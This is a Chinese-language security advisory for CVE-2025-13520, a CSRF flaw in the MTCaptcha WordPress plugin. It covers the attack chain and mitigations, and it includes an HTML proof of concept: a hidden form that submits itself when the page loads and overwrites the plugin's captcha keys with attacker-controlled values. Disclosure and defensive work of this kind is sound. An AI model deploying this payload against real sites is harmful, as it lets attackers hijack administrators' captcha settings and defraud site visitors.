CVE-2025-13520 MTCaptcha WordPress插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13520

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MTCaptcha WordPress Plugin

漏洞概述

CVE-2025-13520是WordPress平台下MTCaptcha插件的一个中危安全漏洞。该插件用于在WordPress网站中集成MTCaptcha人机验证服务，为网站提供防机器人验证功能。漏洞存在于插件的设置更新功能中，由于缺少正确的CSRF令牌（nonce）验证机制，导致未经身份验证的远程攻击者可以构造恶意请求，诱骗已登录的网站管理员在不知情的情况下执行操作，从而修改插件配置。更严重的是，攻击者可以通过此漏洞修改插件的敏感配置参数，包括私有密钥（private key）等关键安全凭证。一旦这些敏感信息被篡改，攻击者可能会利用伪造的验证码服务进行钓鱼攻击、绕过网站的安全验证机制，或者进一步对网站访问者实施欺诈行为。此漏洞需要用户交互配合，即需要诱骗管理员点击恶意链接或访问特制网页才能成功利用。CVSS评分4.3，属于中等严重程度，但考虑到涉及敏感配置信息的篡改，实际危害不容忽视。建议所有使用该插件的WordPress网站管理员尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞的根本原因在于MTCaptcha WordPress插件在处理设置更新请求时，未能正确实施CSRF保护机制。WordPress推荐使用wp_verify_nonce()或check_ajax_referer()等函数验证请求的合法性，但该插件的相关函数（如处理插件设置的admin_init钩子或AJAX处理函数）缺少必要的nonce验证逻辑。攻击者可以利用这一缺陷，构造一个包含恶意参数的POST请求，伪装成来自管理员的合法请求。由于服务器端未验证请求来源的真实性，会错误地执行配置更新操作。具体来说，攻击者可以修改mt-captcha.php第410行附近的设置处理逻辑中暴露的参数，包括但不限于site_key、private_key等敏感配置项。攻击成功的关键在于利用社会工程学技术，诱导管理员访问包含恶意表单的网页，当管理员浏览器自动提交表单时，攻击者的恶意请求就会被发送到目标WordPress站点。由于浏览器会自动携带目标域的Cookie，服务器会认为这是一个已认证的请求，从而执行攻击者指定的操作。攻击者通常会设置一个自动化收集或中转恶意密钥的服务器，以接收被篡改的配置信息。

攻击链分析

STEP 1

1

攻击者识别目标网站使用的MTCaptcha WordPress插件版本，确认版本<=2.7.2

STEP 2

2

攻击者构造恶意HTML页面，包含自动提交的表单，表单参数指向目标WordPress站点的插件设置更新端点

STEP 3

3

攻击者通过钓鱼邮件、社交工程或其他方式诱导目标网站管理员访问恶意页面

STEP 4

4

管理员浏览器自动发送POST请求到目标站点，由于浏览器自动携带认证Cookie，服务器认为请求合法

STEP 5

5

服务器端缺少nonce验证，接受并执行恶意请求，更新MTCaptcha插件的敏感配置（如私钥）

STEP 6

6

攻击者使用伪造的验证码密钥接管网站的验证码服务，可用于绕过验证或对用户实施钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-13520: MTCaptcha CSRF Settings Update -->
<!DOCTYPE html>
<html>
<head>
    <title>MTCaptcha Plugin CSRF PoC</title>
</head>
<body>
    <h2>MTCaptcha CSRF Vulnerability PoC</h2>
    <p>This PoC demonstrates the CSRF vulnerability in MTCaptcha WordPress plugin <= 2.7.2</p>
    
    <form id="csrfForm" action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST" style="display:none;">
        <!-- MTCaptcha settings update parameters -->
        <input type="hidden" name="action" value="mtcap_update_settings">
        <input type="hidden" name="mtcap_public_key" value="attacker_controlled_public_key">
        <input type="hidden" name="mtcap_private_key" value="attacker_controlled_private_key">
        <input type="hidden" name="mtcap_enabled" value="1">
        <input type="hidden" name="mtcap_theme" value="light">
        <!-- Additional settings can be added here -->
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.addEventListener('DOMContentLoaded', function() {
            console.log('Submitting CSRF PoC...');
            document.getElementById('csrfForm').submit();
        });
    </script>
    
    <p>If settings were updated successfully, the MTCaptcha private key has been replaced.</p>
    <p>Administrator should check plugin settings after visiting this page.</p>
</body>
</html>

影响范围

MTCaptcha WordPress Plugin <= 2.7.2

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1)临时禁用MTCaptcha插件，使用其他验证码方案替代；2)限制WordPress后台访问，仅允许受信任的IP地址访问管理后台；3)启用双因素认证保护管理员账户；4)对管理员进行安全意识培训，提高对钓鱼攻击的警惕性；5)使用Web应用防火墙（WAF）监控和拦截异常的插件设置请求；6)定期手动检查插件配置，确保未被未授权修改。建议尽快安排升级到插件最新版本以彻底修复该漏洞。